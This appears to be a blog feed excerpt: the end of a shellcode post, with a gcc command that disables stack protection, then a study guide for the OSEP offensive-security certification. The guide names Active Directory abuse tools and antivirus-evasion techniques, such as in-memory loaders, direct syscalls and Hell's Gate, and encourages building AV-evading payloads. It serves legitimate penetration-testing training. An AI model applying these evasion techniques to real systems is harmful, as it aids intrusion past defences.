<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc <span class="nt">-fno-stack-protector</span> <span class="nt">-z</span> execstack shellcode.c <span class="nt">-o</span> shellcode
</code></pre></div></div>
<p>And execute to get a shell!</p>
pop3ret
In this guide I will show you how to create shellcode and execute binaries using the execve function.
OSEP Study Guide 2022
2022-06-26T13:38:00+00:00
https://www.untrustaland.com/blog/osep-study-guide
<p>Hello! I decided to start my blog with a post about a certification I did a month ago. <strong>OSEP</strong></p>
<h2 id="study-plan">Study Plan</h2>
<p>Well, there are so many things you can study before you take the exam. I will share some of the studying I did before and while the VPN was online.</p>
<h3 id="1---the-material">1 - The material</h3>
<p>It looks obvious that you need to study the material, but you can easily get distracted while studying, clicking on links or searching for something during your reading.
I read the material 5 times in full to understand (<strong>ALMOST</strong>) all the content. Go ahead and read, and try EVERYTHING in the lab; not kidding, you need to understand what you are doing with the techniques during the lab, the exam and your daily life as a pentester, so practice as much as you can.</p>
<h3 id="2---c-and-powershell">2 - C# and PowerShell</h3>
<p>The course syllabus says that you need a basic level of C# to comprehend the subjects, but when you start reading you are <strong>SPAMMED</strong> with C# and PowerShell.
My recommendation is, if you didn’t buy the course yet, start a course on Udemy about C#, like a quick bootcamp; understanding how the language works at a basic/intermediate level is crucial for you to continue your journey into this awesome course.
Regarding PowerShell, there are some things, like a reflection PowerShell runner or in-memory PowerShell execution, that you’re gonna get stuck on if you do not understand them.
My recommendation is also to take a look at the language, understand its logic, and every time you pick up a script, try to understand it; don’t rush the materials. (I am saying this because I did this lol; take your time, it is better to spend more time on one subject than to rush through the materials and get lost.)</p>
<h3 id="3---take-notes">3 - Take notes</h3>
<p>This is very important. I use <strong>Obsidian</strong> to take notes, but you can use whatever you like; take notes about commands, highlight parts of the code that you do not understand and research them.</p>
<h3 id="4---labs">4 - LABS</h3>
<p><strong>DO THE LABS</strong>.</p>
<p>The labs will help you A LOT; there are 6 labs, the first ones are easier and the last ones will make you almost cry.
Take your time, research, and if you get stuck, <strong>TRY HARDER</strong> and continue. I learned A LOT while solving the labs; the 6th lab is the most realistic one.</p>
<h2 id="the-exam">The exam</h2>
<p>I can’t say much about it, but you will have some objectives and you need to achieve them. Offsec did an awesome job on the exam and the labs; you will use all the things you learned, that’s why your notes are important.
My tip here is to write some prototypes of functions, macros, payloads that bypass AV and so on, then use them during the exam; it will speed up your work.
Also, there is one important thing: if you did OSCP or another certification that covers Active Directory, mix those notes with your OSEP notes; they will be valuable during the exam.
I took the entire 48 hours to do the exam and like 14 hours to finish the report.</p>
<h2 id="worth-it">Worth it?</h2>
<p>Of course! In my opinion this exam was one of the best exams I have done in my career; I learned so many things related to AD, antivirus and other bypasses that blew my mind.
If you can afford to buy it or your company pays for the cert, don’t waste time and get it :).</p>
<h2 id="complementary-content">Complementary content</h2>
<p>Some friends of mine said that these labs also help during the preparation:</p>
<ul>
<li>Dante Lab hackthebox</li>
<li>APT Labs hackthebox</li>
<li>Rastamouse lab hackthebox</li>
<li>You can create your own lab and exploit it</li>
</ul>
<p>And this content will help you during your journey:</p>
<ul>
<li>PowerView (Take notes)</li>
<li>Invoke-ACLScanner and Invoke-ACLAbuse (To abuse AD ACLs)</li>
<li>Invoke-SharpLoader (Effective way to bypass AV in memory, but beware of Add-Type)</li>
<li>BloodHound</li>
<li>Standard AD techniques to exploit privileges, permissions and tickets.</li>
</ul>
<h2 id="beyond-the-course">Beyond the course</h2>
<p>Here I give you some topics to research during or after the course to build on the content:</p>
<ul>
<li>D/Invoke</li>
<li>Direct Syscalls</li>
<li>Hell’s Gate technique to bypass AV (Beware of C++, learn it first)</li>
<li>Sektor7 courses on malware dev are also a good path to follow beyond this certification.</li>
<li>STD Api Metasploit (Why disable it first?)</li>
<li>Second stage encoding metasploit</li>
<li>Mix the techniques of AV bypass and create your own payload (<strong>Do not put your payload in virus total</strong>)</li>
<li>Try to bypass the latest version of your AV as an exercise</li>
</ul>
<p>I used only Metasploit during the course and exam, but you can use other C2s as well, like Covenant, and if you get stuck during the exam, breathe, sleep and repeat.</p>
<p>Feel free to send me a message at my email p3ret@untrustaland.com or reach me on LinkedIn with your questions too.</p>
<p>That’s all!</p>
pop3ret